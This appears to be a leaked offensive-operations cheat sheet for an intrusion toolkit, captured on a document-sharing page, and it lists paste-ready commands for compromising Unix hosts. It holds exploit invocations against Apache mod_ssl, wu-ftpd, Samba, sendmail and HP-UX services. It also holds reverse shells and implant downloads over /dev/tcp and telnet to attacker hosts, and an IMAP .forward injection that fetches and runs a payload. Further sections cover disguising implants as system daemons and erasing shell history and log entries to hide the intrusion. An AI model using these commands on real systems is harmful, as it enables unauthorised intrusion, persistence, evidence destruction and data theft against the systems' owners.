Documente Academic
Documente Profesional
Documente Cultură
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
#### CONNECT (or has scrubhands already done this for you?)
phone start
#### REDIAL (if using same ISP and still have floppy this is faster)
redial
#### TCPDUMP
cd /current/down
script -af tcpdump.raw
date; pwd; uname -a; ifconfig -a
tcpdump -ni ppp0
tcpdump -ni eth0
#### WORKING WINDOWS (also use "myenv" at any local prompt for pastables)
xterm &
cd /current/down
script -af script.$$
DISPLAY=:0.0
PS1="\t \h \w> "
PATH=../bin:/current/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin
export DISPLAY PS1 PATH; date; pwd; uname -a; netstat -rn ; ifconfig -a
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
#### TOUCH (see also -nslookup -trace -ping and -icmptime from a NOPEN redirecto
r)
nslookup some.target.ip
nslookup 1.2.3.4
nslookup -query=mx target.ip
nslookup -query=mx 1.2.3.4
ping -nc 5 1.2.3.4
traceroute 1.2.3.4
traceroute -n 1.2.3.4
# or with ICMP
traceroute -I 1.2.3.4
#### INC
#### See ourtn's many many options, to include new triggers
ourtn -h
ourtn -H
#### Get on up there
ourtn -ue 1.2.3.4
# if that one fails you have wrong ip maybe or try this
tn.spayed 1.2.3.4
#### INC TUNNEL (OLD WAY)
tunnel -localport 80 -tunnel FIRSTIP:port -target FIRSTIP -target SECONDIP
#### INC ONLY (no NOPEN)
ourtn 1.2.3.4
#### What to do?
w
# either make a working dir
mkdir /tmp/socket-root && cd /tmp/socket-root && chmod 0700 .
# or just use /tmp if deleting immediately...
cd /tmp && ls -arlt && pwd
~~p
../up/noserver sendmail
chmod 700 sendmail && netstat -an | grep 40019.*LISTEN || (PATH=. D="-l 40019" s
endmail && rm sendmail) ; ls -arlt
# ps -- choose one or more
echo p | crash
ps -ef
ps -efwww
pa auxwww
# NOPEN for business... (should not need if using ourtn -ue, and
# also can be found via didthis if using ourtn)
cd /current/down
../bin/noclient 1.2.3.4:40019
######
## LOCAL PREP (can do from any local dir--paste complete blocks)
## Some of these you willl not use, FYI.
######
## Unalias cp since these prompt otherwise
unalias cp
## Make sure this is right noserver
packrat -l sendmail /current/up/noserver
## Equivalently, do this step by step if you want:
## cp /current/up/noserver /current/up/sendmail
## compress -c /current/up/sendmail > /current/up/sendmail.Z
## chmod 755 /current/up/noserver /current/up/sendmail*
## uuencode /current/up/sendmail.Z sendmail.Z > /current/up/sendmail.Z.uu
## pick right poptop
cp /current/up/poptop.i586-pc-linux-gnu /current/up/pt
sum -s /current/up/pt /current/up/sendmail
chown 0:0 /current/up/pt* /current/up/sendmail*
tar -C /current/up -cvf /current/up/u.tar sendmail pt
compress -c /current/up/u.tar > /current/up/u.tar.Z
uuencode /current/up/u.tar.Z u.tar.Z > /current/up/u.tar.Z.uu
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
## Following should contain both sendmail and pt
tar tvzf /current/up/u.tar.Z
## Only need this if not using the "mostly automated" method below
gedit /current/up/u.tar.Z.uu&
## Probably don't need the rest unless target has no tar or uncompress:
uuencode /current/up/pt pt > /current/up/pt.uu
uuencode /current/up/sendmail sendmail > /current/up/sendmail.uu
uuencode /current/up/u.tar u.tar > /current/up/u.tar.uu
gedit /current/up/*.uu&
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
######
-jackpop 1.2.3.4 13 REDIRECTIP 23064
## Option 3 run command on target.
## Choose offset if needed, and IN bless or not as desired.
3
############################################
###### EITHER CHOOSE THIS COMMAND
## Mostly automated method--only works if you uudecode is on target.
## AND YOU DO NOT GET AN INTERACTIVE SHELL--until NOPEN is up and
## running, that is. (The environment syntax here will fail on csh
## or tcsh, e.g. with FreeBSD.)
##
## If this fails (due to missing uudecode, for example), you will
## be dropped into a shell, instead.
######
## IF this next line comes back with OOPS you are in an interactive shell and
## something failed with the command (wrong shell? uudecode/uncompress not there
?)
##
##NON-ICESKATE METHOD (using poptop):
##
##stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;s
leep 5;uudecode&&uncompress u.tar.Z&&tar xf u.tar&&PATH=. D=-l40019 sendmail&&rm
-f sendmail u.tar&&PATH=. exec pt 40019)||(echo OOPS&&exec sh)
##
####
## MODIFIED SINCE NO POPTOP AVAILABLE IN OP
##
##
stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sle
ep 5;uudecode&&uncompress sendmail.Z&&PATH=. D=-l40019 ./sendmail&&rm -f sendmai
l)||(echo OOPS&&exec sh)
##
###### OR CHOOSE THIS COMMAND###############
## More Manual method, gives interactive shell--WHOSE CONTENTS GO ACROSS IN THE
CLEAR.
######
# Command to run (some prep, then exec shell):
cd /tmp ; ls -arlt ; mkdir -p /tmp/socket-root ; cd /tmp/socket-root ; ls -alrt
; pwd ; exec sh
##########################
######
## That pops up a window connecting to port 13
######
######
## REMOTE -- Time to run NOPEN (and it inherits this session via pt)
######
# Start server listening and connect to it via poptop
# (you should see "tty should be setup...")
PATH=. D=-l40019 sendmail
PATH=. pt 40019
# Typing this next "---
" string activates poptop here and
# there to connect a local noclient to the remote noserver
# via this already established TCP session.
---
######
## FINI - clean up a bit
######
## Once NOPEN is up and running, both the previous hop's
## noclient window where -jackpop was run and the shell
## window it popped up will be tied up until we're done
## on the jackladder'd target.
######
-cd /tmp
-ls /tmp/socket-root
rm -rf /tmp/socket-root
###### Bailing
## First, -exit any NOPEN sessions you started via the -tunnel,
## close that tunnel and quit out of -tunnel.
##
## Burn the NOPEN server. Post -burn/BURN on the new nopen,
## the popped up window should exit on its own. Use the "DONE"
## in the -jackpop window then.
######
-burn
BURN
DONE
######################################################## END -jackpop/nopen one-
port
######################################################## END -jackpop/nopen one-
port
#### CONNECT
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
../bin/noclient 1.2.3.4:40019
-nstun 1.2.3.4 40019
-rm sendmail
#### GO FREESTYLE
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
###
### BEGIN USER.MISSION File user.mission.generic.COMMON (see also ../etc/user.
mission.generic.COMMON)
###
############- TOUCH
#only from redirector **SKIP**
nslookup domain
nslookup ip
nslookup -query=mx domain_name
nslookup -query=mx domain_name
############- on solaris pingflag is -s
ping IP
TTL OS
2 - 32 Windows for Workgroups
2 - 32 Windows 95
34 - 64 Red Hat Linux (< version 6.0)
34 - 64 Digital UNIX
34 - 64 SCO
98 - 128 Windows NT
98 - 128 Windows 95 w/MS Dialup Network Upgrade
98 - 128 Windows 98
225 - 255 UNIX
Note: recent Sun OS 5.9 boxes TTL 34-64.
################### PITCHIMPAIR INSTRUCTIONS ###################################
###
###
### begin user.mission.pitchimpair
###
### get rid of pesky spaces at beginning of lines (fixes pasted html)
:%s/^[ ]*//g
:1
#######################################################################
#
# Need a new userlist ?
#
# -ls /global/m*/MB/*/*/*/mailinfo.dat > L:/current/down/userlist
#
# (N.B. the -ls will give the mailinfo.dat file timestamps in the
# format expected by lsstamp ... see next command)
#
# ## now, LOCALLY run lsstamp userlist > userlist.sorted
# ## (lsstamp will sort the -ls lines in date order)
#
# Collection: -get /global/m1/MB/96/8/karachi:moftec/mailinfo.dat
#
#
#######################################################################
mx
:%s/LOCAL_IP/LOCALIP/g
:%s/PITCH_IP/PITCH_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_NAME/TARGET_NAME/g
:%s/TARGET_DOMAIN/TARGET_DOMAIN/g
:%s/NETCAT_PORT/38745/g
:%s/RAT_PORT/RAT_PORT/g
:%s/RAT_NAME/sendmail/g
:%s/WORK_DIR/.scsi/g
:%s/mm-dd-yyyy/mm-dd-yyyy/g
`x
### Use this if we already own the target:
### Create /current/etc/hops.txt file
HOP1: PITCH_IP:R -lue
HOP2: TARGET_IP:R -uec
### Use something similar to this for annoying packets in the red tcpdump:
### Paste in a non-scripted window:
echo "pathcost" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "NetBeui" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "who-has" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "router" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
### in a local window, connect to pitchimpair via nopen, and start tunnels ####
### Ex: noclient 217.53.1.2:39222
cd /current/down
noclient PITCH_IP:RAT_PORT
#-readrc ../etc/norc.solaris
########################################
# INCISION to FreeBSD implant
########################################
# from local LINUX scripted window
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lue PITCH_IP
-irtun 219.238.199.144 RANDOM_PORT -z -s 80
setenv D -lNOPEN_PORT # NO = sign and use setenv
set path = (. /usr/bin /bin) # NO QUOTES and use set
~~p
/current/up/noserver cron # freebsd noserver
which cron
cron
# from NOPEN on the PITCHIMPAIR host:
-nstun 219.238.199.144:NOPEN_PORT
-cd /tmp
-lt
-rm cron
-lt
-------------------------------------
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lz TARGET_IP # or -irtun TARGET_IP PORT -lz
setenv D -lNOPEN_PORT # NO = sign and use setenv
set path = (. /usr/bin /bin) # NO QUOTES and use set
~~p
/current/up/noserver crond # freebsd noserver
which crond
crond
noclient TARGET_IP:NOPEN_PORT or -nstun TARGET_IP NOPEN_PORT
########################################
# JACKLADDER
########################################
### can be done without a redirector and will upload and execute nopen
jacktelnet.sh TARGET_IP LOCAL_IP NETCAT_PORT WORK_DIR RAT_NAME [JACKPORT]
########################################
# JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT)
########################################
### Local window, let this sit and wait:
ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1
### on PITCH: set up window for nopen callback
-nrtun 113
### on PITCH: set up tunnel for nopen upload
-tunnel
r NOPEN_UPLOAD_PORT
### on PITCH, run jackpop to tickle incision
-jackpop 202.38.128.1 110 211.40.103.194 13732
#3 run a command
/dev/ttyia2 PITCH_IP 443
yes ### let incision bless the commands
### incision will talk to your local window, then callback to your -nrtun window
###################################################
### REDIRECTING IN THRU WINDOWS
###################################################
################## SENDING TRIGGER THRU WINDOWS (2000 or XP) BOX ##############
############
##### NT4.0 doesn't allow the use of raw sockets, which is needed to send the I
N trigger ##
mx
:%s/LOCAL_WINDOWS_IP/LOCAL_WINDOWS_IP/g
:%s/LOCAL_UNIX_IP/LOCAL_UNIX_IP/g
:%s/UNIX_INCISION_TRIGGER_PORT/UNIX_INCISION_TRIGGER_PORT/g
:%s/INCISION_CALLBACK_PORT/INCISION_CALLBACK_PORT/g
:%s/NOPEN_CALLBACK_PORT/NOPEN_CALLBACK_PORT/g
:%s/WIN_TARG_INTERNAL_IP/10.140.0.9/g
:%s/TARGET_IP/10.140.0.40/g
`x
## Usage: script unixredirect.eps LOCAL-WINDOWS-IP LOCAL-UNIX-IP UNIX-INCISION-T
RIGGER-PORT INCISION-CALLBACK-PORT NOPEN-CALLBACK-PORT
script unixredirect.eps LOCAL_WINDOWS_IP LOCAL_UNIX_IP UNIX_INCISION_TRIGGER_POR
T INCISION_CALLBACK_PORT NOPEN_CALLBACK_PORT
### or run the following by hand
# For additional nopen connections, increment the lplisten port, but kee
p the same target nopen port:
# monitor redirect -tcp -lplisten RAT-PORT+1 -target TARGET-IP RAT-PORT
-bind LOCAL-WIN-IP
# Ex. - monitor redirect -tcp -lplisten 47109 -target 10.1.1.3 47108 -bi
nd 10.1.1.2
# Ex. - monitor redirect -tcp -lplisten 47110 -target 10.1.1.3 47108 -bi
nd 10.1.1.2
monitor redirect -tcp -lplisten RAT_PORT+1 -target TARGET_IP RAT_PORT -b
ind LOCAL_WIN_IP
### On Linux box: #####################
# Once the first three windows commands are set up, you can send the tri
gger:
# ourtn -W LOCAL-WIN-IP:LOCAL-PORT -o RAT-PORT -p ISH-CALLBACK-PORT -i W
IN-TARG-IP -ue TARGET-IP
# Ex: ourtn -W DOOBIE_IP:32654 -o 47108 -p 28345 -i 10.1.1.4 -ue 10.1.1
.3
#ourtn -W LOCAL_WIN_IP:LOCAL_PORT -o RAT_PORT -p ISH_CALLBACK_PORT -i WI
N_TARG_IP -ue TARGET_IP
#ourtn -W 192.168.254.253:31413 -O 41611 -C 202.154.225.27 -p 37541 -i 2
02.154.225.27 -ue 10.140.0.40
#ourtn -ueW 192.168.254.253:31413 -i 202.154.225.27 -C 202.154.225.27 -p
37541 -O 41611 10.140.0.40
TRAVOLTA=1 ourtn -ueW 192.168.254.22:8942 -i 10.140.0.9 -C 10.140.0.9 -p
18855 -O 7549 10.140.0.40
### Use the TRAVOLTA option to keep nopen from dying in 5 hours, only if you thi
nk the op will be extended
### If alien has issues with an nfs mount point, so use the "-Q" option to ourtn
and DO NOT run the following
### -lt /, df -k, otherwise, you'll tie up your window and will need to kill
the process;
### it's better NOT to run nopen built-ins on alien so that you can kill som
ething if it hangs
incision trigger = UNIX_INCISION_TRIGGER_PORT
incision callback = INCISION_CALLBACK_PORT
nopen callback = NOPEN_CALLBACK_PORT
# on windows side:
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT -target TARGET_IP NOPE
N_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+1 -target TARGET_IP NO
PEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+2 -target TARGET_IP NO
PEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
-listen NOPEN_CALLFORWARD_PORT
noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+1
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+2
#### To kill one server first use it to start a new one (new one won't b
urn)
D=-l23477 PATH=. sendmail
-burnBURN
# Connect to nopen; suggest using the port override option (-o) above fo
r simplicity
# For additional windows, you and the windows person must increment the
redirected port
# Ex. - noclient 10.1.1.2:47108
# Ex. - noclient 10.1.1.2:47109
#noclient 10.1.1.2:RAT_PORT+1
###########################################################
# YES - for HPUX
###########################################################
./yes 127.0.0.1 100083 1 PROGRAM_PORT 0x40062ea8 'mkdir /tmp/.scsi;cd /tmp/.scsi
&& /usr/bin/telnet PITCH_IP NETCAT_PORT </dev/console |uudecode 2>&1 > /dev/nul
l 2>&1 && uncompress -f sendmail.Z;chmod 0700 sendmail && export D=-cPITCH_IP:NO
PEN_PORT && ./sendmail'
###########################################################
# CUP
###########################################################
-gs wearcup -h
### to have it cleanup in 3 hours:
-gs wearcup -r <remote_name> -w 3h
### to have it cleanup in 2 minutes:
-gs wearcup -r <remote_name> -w 120s
### or, run it by hand:
### locally, edit cup, and change the working dir, and time in minutes to wait f
or execution
#########################################################
# EVENLESSON
#########################################################
# runs against Linux systems running Apache with mod_ssl accessing
# OpenSSL 0.9.6d or earlier on x86 architectures
# May not work first time; Try increasing the number of connections to the targe
t by 6.
# If this fails, try increasing the number of connections by 4 until you reach 4
0.
# SHould give you prompt on system - may have to elevate
#-scan 443 TARGET_IP
-scan http TARGET_IP
-scan ssl TARGET_IP
### Redirector:
-tunnel
l 443 TARGET_IP
r NETCAT_PORT
### Usage:
# Usage: ./apache-ssl-linux <-i hostname> [-s scan banner] [-t arch] [-p port] [
-n <conne
ctions>] [-a 0x<address>]
### Usage for default values:
./apache-ssl-linux -i TARGET_IP -t ARCH
##### Cleanup
/var/log/httpd/error_log
###########################################################
# EYEMASK
###########################################################
### Imap masqerade
### Bring a local to get root
### for solaris
nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {145}
"| /bin/ksh -c '/bin/cat</dev/tcp/PITCH_IP/53>/tmp/sendmail;chmod +x /tmp/sendma
il;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT
# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
### cleanup
possible logging in /var/adm/messages (should blend in if it fails)
###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection:
./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection:
-tunnel
l 21 TARGET_IP
# Locally:
./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# SHould give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# IF it complains about the user/pass correct, then it's not vulnerable to
# our pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure
###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0(SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release in not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost +
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "
cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target
### Locally
netstat -an |grep 6000
xhost +
########### REDIRECTED:
### Redirector:
-tunnel
l 443 TARGET_IP
r 6006 127.0.0.1 6000
r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bi
n/id; /bin/ps -auxww; /bin/w)|/usr/
bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -d
isplay LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh</dev/tcp/LOCAL_IP/
NETCAT_PORT>&0 2>&0)"
### if the exploit stalls after a bit, hit Ctl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window
### Once you have access........
### you need to first clean extraneous processes started by httpd
### run this to help clean:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
pwd
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&-
/usr/sbin/lsof |grep ^sh
uname -a; id
mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp
cd /tmp/.httpd-lock; pwd
which uudecode uncompress
#telnet PITCH_IP NETCAT_PORT </dev/tty | uudecode ; ls -la
#uncompress crond.Z; chmod 700 crond; ls -la
# if no uudecode, use this
### locally:
# nc -l -vv -p NETCAT_PORT < crond
-nstun TARGET_IP
-nrtun NOPEN_PORT
noclient TARGET_IP
### need to elevate so you can clean logs (use eventstart - ptrace won't work on
RH9)
### Logging:
-lt /var/log/httpd
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
/var/log/httpd/ssl_error_log
/var/log/httpd/error_log
-lt /var/log
/var/log/messages
/var/log/secure
/var/log/maillog
egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_
access_log
egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl
_request_log
egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error
_log
egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_e
rror_log
egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages
egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure
egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog
####################################
### ENVELOPSWALLOW
####################################
# buffer overflow for Apache Web
./envelopswallow
# plug in the options of the matching line
# change TARGET_IP to 127.0.0.1 if using redirection
# 4.0 FreeBSD RELEASE apache-1.3.12(distro binary) apache+mod_ssl-1.3.12+2
.6.2(distro binary)
# apache+php-1.3.12+3.0.15 (distro binary) apache+php-1.3.12+4.0b3 (distro
binary)
# apache+ssl-1.3.9+1.37(distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_
IP:80
# 4.1 FreeBSD Apache 1.3.12(distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_
IP:80
./envelopswallow -o f -w 1000 -b 0xbfbf0000 -d -134 -r 11 -z 16 -h TARGET_
:80
### Let it run for about addresses (rows of PppP...ppP's) then bail if it doesn'
t hit
### maybe let it run an hour or less
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
### pitch window
-nstun TARGET_IP RAT_PORT
######################################
# RFORKX
######################################
### elevation for x86/FreeBSD
# Works-on :
# FreeBSD 3.1-RELEASE (GENERIC) #0: Mon Feb 15 11:08:08 GMT 1999
# FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
# FreeBSD 3.3-RELEASE (GENERIC) #0: Thu Sep 16 23:40:35 GMT 1999
# FreeBSD 4.0-RELEASE (GENERIC) #0: Mon Mar 20 22:50:22 GMT 2000
# FreeBSD 4.1-RELEASE (GENERIC) #0: Fri Jul 28 14:30:31 GMT 2000
# FreeBSD 4.2-RELEASE (GENERIC) #0: Mon Nov 20 13:02:55 GMT 2000
### fails on some newer versions of FreeBSD
######################################
# SM11X
######################################
Target platform 1: Red Hat Linux release 7.0 (Guinness)
ESMTP Sendmail 8.11.0/8.11.0
Target platform 2: Red Hat Linux release 7.1 (Seawolf)
ESMTP Sendmail 8.11.2/8.11.2
Target platform 3: FreeBSD 4.2-RELEASE
ESMTP Sendmail 8.11.1/8.11.1
Caldera Linux 3.1
Conectiva Linux 6.0
Conectiva Linux 7.0
Immunix Linux 7.0
SuSE Linux 7.0
SuSE Linux 7.1
SuSE Linux 7.2
"sendmail" daemon with any of the versions...
8.11
8.11.1
8.11.2
8.11.3
8.11.4
8.11.5
8.12.beta5
8.12.beta7
8.12.beta10
8.12.beta12
8.12.beta16
./sm11x -t OPTION
### look for the cksums to match, if they don't, you have 5 secs to control-c
### if you don't control-c, a second 5-sec counter will start; you'll also see t
he following message:
Recipient names must be specified
###### Cleanup:
/var/log/messages (brute force)
/var/log/error_log (bus error, segment. fault, server seems busy)
###################################
# EGGBARON
###################################
### Linux and FreeBSD systems running Samba 2.2.x (pre 2.2.8a) on x86 architectu
res.
### If successful, it has samba start a listener on port 45295 and the exploit w
ill attempt
### to connect to it to give you root.
### If you're redirecting, you need to set up a tunnel to port 45295 on the targ
et,
### then connect to it via netcat.
### Note, that if you use the same ports on both tunnel ends, eggbaron may think
that it
### was already successful because of false positives by the tunnel
### Might need to let it give "failed" messages 20-30 times before it works.
./sambal
samba-2.2.x < remote root
--------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and p
rior,
3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode
./sambal -t0
samba-2.2.x < remote root
--------------------------
01. samba-2.2.x - Debian 3.0 [0xbffffea2]
02. samba-2.2.x - Gentoo 1.4.x [0xbfffe890]
03. samba-2.2.x - Mandrake 8.x [0xbffff6a0]
04. samba-2.2.x - Mandrake 9.0 [0xbfffe638]
05. samba-2.2.x - Redhat 9.0 [0xbffff7cc]
06. samba-2.2.x - Redhat 8.0 [0xbffff2f0]
07. samba-2.2.x - Redhat 7.x [0xbffff310]
08. samba-2.2.x - Redhat 6.x [0xbffff2f0]
09. samba-2.2.x - Slackware 9.0 [0xbffff574]
10. samba-2.2.x - Slackware 8.x [0xbffff574]
11. samba-2.2.x - SuSE 7.x [0xbffffbe6]
12. samba-2.2.x - SuSE 8.x [0xbffff8f8]
13. samba-2.2.x - FreeBSD 5.0 [0xbfbff374]
14. samba-2.2.x - FreeBSD 4.x [0xbfbff374]
15. samba-2.2.x - NetBSD 1.6 [0xbfbfd5d0]
16. samba-2.2.x - NetBSD 1.5 [0xbfbfd520]
17. samba-2.2.x - OpenBSD 3.2 [0x00159198]
18. samba-2.2.8 - OpenBSD 3.2 (package) [0x001dd258]
19. samba-2.2.7 - OpenBSD 3.2 (package) [0x001d9230]
20. samba-2.2.5 - OpenBSD 3.2 (package) [0x001d6170]
21. Crash (All platforms) [0xbade5dee]
# EGGBARON may not work the first time using the target number as the -t flag.
# Try bruteforcing it using the -b flag. This usually works, and after very few
tries.
# If this is taking a long time, try setting the bruteforce step size down using
-b 100.
# Subsequently, the -t flag will work
./sambal -b 0 TARGET_IP
####### redirected:
### via pitch:
-tunnel
l 1139 TARGET_IP 139
l 4444 TARGET_IP 45295
r NETCAT_PORT
### Locally:
./sambal -p 1139 -b 0 127.0.0.1
./sambal -f -p 1139 -b 0 127.0.0.1
# skip to nc section
### If you think you can't contact the target directly and want the exploit to
### call back to you, use the "-c WINDOWS_TARG_CALLBACK" option, and start
### a windows tunnel and unix netcat listener on port 45295
### Even if the "-c WINDOWS_TARG_CALLBACK" is used, both a callback to port 4529
5 _AND_
### a listener on the target's port 45295 will be created
### Locally:
./sambal -t0
./sambal -r 0xbffffb00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 200000
0 -p 1139 WIN_LOCAL
./sambal -r 0xbffffd00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 200000
0 -p 1139 WIN_LOCAL
### try connecting via netcat after any "session failed" message when redirectin
g:
nc PITCH_IP_or_WINDOWS_LOCAL 4444
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with /de
v/tcp way)
### nc -l -v -p NETCAT_PORT < sendmail
pwd
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
ls -l /usr/bin/uudecode
/bin/cat</dev/tcp/WINDOWS_TARG_CALLBACK/NETCAT_PORT>/tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id
### Cleanup
# look for stray process in netstat (bunch of funky chars followed by /bin/sh on
port 45295)
# then kill the associated process running it:
netstat -anlp | grep 45295
ps -ef |grep <PID>
kill -9 <PID>
-cd /tmp
-lt
uname -a
### start another nopen listener on a random port (not reusing the socket)
unset I; PATH=. D=-l38475 .httpd
### elevate using your favorite local (probably EVENTSTART), then start
### another privileged noserver, connect to it, then clean up
### Logging:
/var/log/httpd/ssl_error_log
/var/log/httpd/access_log
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
##############################################################################
### EXPIRETRACHEA
#############################################################################
# close to freebsd 4.3
# copy nopen for freebsd 4.3 as noserver in /current/up; automatically uploads a
nd connects
-scan mail TARGET_IP
# returns BorderWare MXtreme Mail Firewall
#cgi-bin/remote/expiretrachea/i586-pc-linux-gnu/opscript.borderware
#expiretrachea_helper.pl
#expiretrachea.pl -h hostname -c PITCH_IP
### redirected:
-tunnel
l 80 TARGET_IP
r 25
# 1st window
expiretrachea_helper.pl -c PITCH_IP
# 2nd window
